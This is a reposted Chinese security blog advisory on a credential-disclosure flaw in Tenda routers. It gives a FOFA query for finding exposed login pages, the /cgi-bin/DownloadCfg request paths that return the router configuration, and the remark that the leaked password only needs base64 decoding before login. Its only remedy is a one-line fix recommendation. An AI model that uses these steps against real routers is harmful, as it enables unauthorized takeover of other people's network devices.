Tenda路由器账号密码信息泄露漏洞

admin 2024年10月28日12:50:39评论39 views字数 354阅读1分10秒阅读模式

简介
Tenda是一家中国的网络设备制造商,成立于1999年,专注于提供各种网络产品,包括路由器、交换机、无线接入点和网络适配器等。Tenda路由器以其高性价比、易于设置和良好的用户体验而受到消费者的欢迎。
漏洞描述
Tenda路由器 /cgi-bin/DownloadCfg接口处存在信息泄露漏洞,攻击者可通过此漏洞获取路由器后台账号密码。
fofa语法
title="Tenda | LOGIN" && country="CN"
漏洞复现
/cgi-bin/DownloadCfg.jpg/cgi-bin/DownloadCfg/RouterCfm.jpg
Tenda路由器账号密码信息泄露漏洞
密码通过base64解密即可登录成功
Tenda路由器账号密码信息泄露漏洞
批量检测:
Tenda路由器账号密码信息泄露漏洞
修复建议
及时更新,禁止访问或删除!!!
网安交流群

原文始发于微信公众号(白帽攻防):Tenda路由器账号密码信息泄露漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日12:50:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Tenda路由器账号密码信息泄露漏洞http://cn-sec.com/archives/3323157.html

发表评论

匿名网友 填写信息